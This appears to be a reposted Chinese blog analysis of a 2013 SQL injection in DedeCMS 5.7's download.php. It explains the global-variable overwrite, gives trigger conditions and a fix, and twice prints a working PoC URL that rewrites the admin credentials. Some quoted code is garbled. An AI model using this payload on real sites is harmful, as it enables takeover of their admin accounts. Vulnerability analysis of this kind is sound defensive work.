Dedecms最新注入漏洞download.php修复方案

　　沈阳电脑维修上门服务13889116605：最近看到网上曝出的dedecms最新版本的一个注入漏洞利用，漏洞PoC和分析文章也已在网上公开.但是在我实际测试过程当中，发现无法复现。原因是此漏洞的利用需要一定的前提条件，而原分析文章当... 最近看到网上曝出的dedecms最新版本的一个注入漏洞利用，漏洞PoC和分析文章也已在网上公开.但是在我实际测试过程当中，发现无法复现。原因是此漏洞的利用需要一定的前提条件，而原分析文章当中并没有交代这些，所以这里将我的分析过程以及一些触发的必要条件总结了一下。一.漏洞跟踪发布时间：2013年6月7日漏洞描述： DedeCMS是一个网站应用系统构建平台，也是一个强大的网站内容管理系统。基于PHP+MySQL的技术架构，完全开源加上强大稳定的技术架构，既可以用来构建复杂体系的企业信息门户或电子商务网站平台，也可以用来管理简单内容发布网站，不管是商务资源门户还是娱乐信息门户，它都是您管理网站的好帮手。漏洞触发的根源在于dedesql.class.php在调用$GLOBALS[‘arrs1’]、$GLOBALS[‘arrs2’]这两个全局变量之前未对其进行初始化，导致能够覆盖任意全局变量。漏洞危害：因为dedecms的使用非常广泛，而此漏洞利用方便，危害性高，能够远程获取管理后台，进而直接getshell获取系统控制权。触发条件：确保php.ini中使用php_mysql.dll同时未开启php_mysqli.dll，如图所示：受影响版本：dedecms5.7 二.漏洞原理首先说一下dedecms不安全的参数处理机制，这里我们看一下/include/common.inc.php代码的第79行： foreach(Array(‘_GET’, } } 万恶之源其实就在这里，基本上目前dede被发现的漏洞全都死在这里。我们可以看到，程序从GPC数组中取出名值对后，只是对$_v做了简单的addslashes处理，就直接赋给了${$_k}，实现了类似全局变量覆盖的机制，设计的初衷是为了开发方便，但却存在着严重的安全问题。PHP在经历了这么多年的更新换代终于修补了register_globals问题，但是dede的这段代码使php付出的努力全部白费。下面我们回归漏洞。首先是/include/dedesql.class.php的第589-600行，在执行这段代码之前，程序未初始化$arrs1和$arrs2这两个数组。结合前面提到的dede不安全的参数处理机制，利用这段代码我们可以控制$GLOBALS[$v1]的值。例如在这个漏洞中，$GLOBALS[$v1]是拼接而成，我们可以控制$GLOBALS[]的值。然后，我们来看一下如何利用$GLOBALS[]。这里在/include/dedesql.class.php的第512行SetQuery函数中，代码如下这里因为$GLOBALS[]是可控的，进而$prefix也是可控的，所以在这儿就造成了SQL注入。下面跟踪一下整个漏洞的触发过程，这是网上已经公开的PoC： http://localhost/dedecms5.7/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=116&arrs2[]=101&arrs2[]=115&arrs2[]=116&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35 首先看这个if判断，意思是如果开启了mysqli扩展，则包含dedesqli.class.php。这里存在漏洞的代码在dedesql.class.php中，所以漏洞利用的前提条件是必须关闭mysqli扩展。www.it165.net 这里跟入dedesql.class.php代码，如图这里我们传入的arrs1、arrs2两个数组因为还没有被初始化，所以这里$v1、$v2拼接为字符串，如图所示所以执行到这里$GLOBALS[]被覆盖为 admin`SET`userid`=’test’,`pwd`=’f297a57a5a743894a0e4′whereid=1# 继续跟踪代码执行，跟入ExecuteNoneQuery2函数，一直跟进SetQuery，如图这里因为$GLOBALS[]是我们可控的，所以就造成了注入，这里看一下$sql的值，如图所示因为ExecuteNoneQuery2函数没有使用mysql-ids进行过滤，所以这里借助它来注入。执行update成功之后，后台账户为test，密码为admin。三.漏洞验证 PoC： http://localhost/dedecms5.7/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=116&arrs2[]=101&arrs2[]=115&arrs2[]=116&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35 验证截图：四.漏洞修复 0×01、修改php.ini，确保开启php_mysqli.dll扩展。 0×02、修改/include/dedesql.class.php中的代码，如下所示 $arrs1=array(0x63,0x66,0x67,0x5f,0x70,0x6f,0x77,0x65,0x72,0x62,0x79); $arrs2=array(0x20,0x3c,0x61,0x20,0x68,0x72,0x65,0x66,0x3d,0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f, 0x77,0x77,0x77,0x2e,0x64,0x65,0x64,0x65,0x63,0x6d,0x73,0x2e,0x63,0x6f,0x6d,0x20,0x74,0x61,0x72, 0x67,0x65,0x74,0x3d,0x27,0x5f,0x62,0x6c,0x61,0x6e,0x6b,0x27,0x3e,0x50,0x6f,0x77,0x65,0x72,0x20, 0x62,0x79,0x20,0x44,0x65,0x64,0x65,0x43,0x6d,0x73,0x3c,0x2f,0x61,0x3e); if(isset($GLOBALS[])) { $v1=$v2=”; for($i=0;isset($arrs1[$i]);$i++) { $v1.=chr($arrs1[$i]); } for($i=0;isset($arrs2[$i]);$i++) { $v2.=chr($arrs2[$i]); } $GLOBALS[$v1].=$v2; }
上一篇:电子商务系统ShopNC多个漏洞(可暴力 getshell)

搜索